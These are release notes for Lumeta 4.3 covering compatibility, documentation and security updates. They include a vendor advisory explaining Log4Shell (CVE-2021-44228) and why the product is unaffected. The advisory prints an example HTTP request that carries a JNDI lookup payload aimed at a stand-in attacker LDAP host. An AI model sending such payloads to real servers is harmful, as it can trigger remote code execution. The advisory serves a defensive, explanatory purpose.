Page tree

Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Lumeta 4.3 is compatible with Lumeta Cloud Scout 1.1 (release 1.20200401.105457.dev). No changes have been made to Lumeta CloudVisibility. 


Tip
titleAlert

Lumeta uses version 1.2 of Log4j which is unaffected by CVE-2021-44228 as the JndiLookup Class required for this vulnerability to be exploited was not made available until Log4j version 2.x.  For more information, jump to Security Advisories.


Documentation

On the main menu, we've added a Help tab from which you can access the Lumeta API Reference in Swagger and this Support site, https://lumetadocs.firemon.com/.

...

Our product is called "Lumeta" on the GUI, CLI, and API. The legacy names "Spectre" and "ESI" have been removed or replaced. However, the default hostname and root prompt is programmed to be "esi-" followed by the hex encoded IP address. This instance is temporary and will only remain until your system admin changes the host name. 


Database Schema

The 4.3 database schema, which shows a visual representation of the Lumeta database, is available here.

Image Modified 

...

http://lumeta-supportfiles.firemon.com/schema/schema-4.3.0/output-allschemas/

Anchor
cve
cve
Security Updates & STIG 

Lumeta 4.3 resolves Common Vulnerabilities & Exposures (CVEs) and incorporates a variety of security-related (and non-security-related) enhancements. See Security Advisories 4.3 (coming soon) for a list of CVEs resolved in this Lumeta 4.3 release. 

Tip
titleInformation on CVE-2021-44228 

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228  

CVE-2021-44228

Apache Log4j2 Remote Code Execution Vulnerability Affecting: Apache Log4j 2.x <= 2.15.0-rc1 The vulnerability is exploited when the Java package 'org.apache.logging.log4j.core.lookup.JndiLookup' or any code that references the JndiLookup Class is leveraged in a very specific way that will cause the software to translate a crafted request into code that can be executed by the server. 

An example of this behavior 

  1. An attacker triggers the target device to log the JNDI string via web site headers:GET /HTTP/1.1Host: example.com User-Agent:${jndi:ldap//hijack-your-stuff.co/xyz} 
  2. The server passes the crafted log string to the vulnerable log4j instance:${jndi:ldap//hijack-your-stuff.co/xyz} 
  3. Log4j processes the string and queries the LDAP server:ldap//hijack-your-stuff.co/xyz 
  4. The LDAP Server responds with directory information containing the malicious Java Class which the server deserializes and installs and remote code execution is now possible. 

 Lumeta’s stand on CVE-2021-44228 

Lumeta uses version 1.2 of Log4j which is unaffected by CVE-2021-44228 as the JndiLookup Class required for this vulnerability to be exploited was not made available until Log4j version 2.x. (Note: changelog for Apache 2.0-beta9 - https://logging.apache.org/log4j/2.x/changes-report.html#a2.0-beta9"Add JNDILookup plugin. Fixes LOG4J2-313. Thanks to Woonsan Ko." under "Release 2.0-beta9 – 2013-09-14") 


Change Log Updated 9/8/2021

...